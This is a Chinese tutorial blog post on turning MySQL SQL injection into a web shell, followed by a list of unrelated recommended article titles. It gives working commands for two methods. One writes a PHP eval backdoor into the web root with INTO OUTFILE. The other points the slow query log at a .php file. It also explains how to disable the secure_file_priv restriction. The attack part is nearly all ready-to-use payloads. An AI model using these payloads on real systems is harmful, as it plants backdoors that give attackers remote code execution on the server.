SQL注入MYSQL中写入木马getshell的两种方法

imawuya / 2023-09-05 / 原文

into outfile直接写入木马文件

使用条件：

知道网站的绝对路径
secure_file_priv不能为null
拥有写入文件的权限

使用方法：

利用into outfile写入木马文件

select "<?php eval($_POST['cmd']);?>" into outfile "D:\\phpstudy_pro\\WWW\\shell.php"

如果执行成功，生成D:\WWW\shell.php，并写入

<?php @eval($_POST['pass']);?>

如果出现：提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是因为mysql设置的权限的问题，mysql对通过文件导入导出作了限制，默认不允许。

show variables like '%secure%';

修改my.ini

secure_auth = ON
secure_file_priv = ""

利用日志文件写入木马

首先需要开启日志功能

set global slow_query_log=1;

其次设置日志存储路径

SET GLOBAL slow_query_log_file='D:\\phpstudy_pro\\WWW\\shell.php';

最后执行SQL语句

select '<?php eval($_GET[H])?>' or SLEEP(11);

SQL注入MYSQL中写入木马getshell的两种方法更多相关文章

今日报告-66

设置Windows10暂停更新3000天

AQS公平锁的流程

AMD锐龙7 7800X3D网游专项测试：竟比i9-13900KS强了15%

常用总线技术基本参数对比

探索图像数据中的隐藏信息：语义实体识别和关系抽取的奇妙之旅

设置Chrome浏览器自动升级

JavaScript – 小技巧 Tips

postgresql在插入数据后怎么获取自增id

EF Core 的基本使用

error: failed to push some refs to 'https://github.com/*******/********.github.io.git'

欧拉降幂

编程语言能力对比

基于机器视觉的小车轨迹控制软件界面展示

随机推荐

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java，启动！

什么是IT技术

即将到来！

2024/11/1日日志关于JavaScript简介&引入方式以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

android 13 更改手机信号调整

BFS(Breath First Search 广度优先搜索)

Visual Studio Code（VSCode）中设置中文界面

影响黄金价格大幅波动的因素主要有哪些？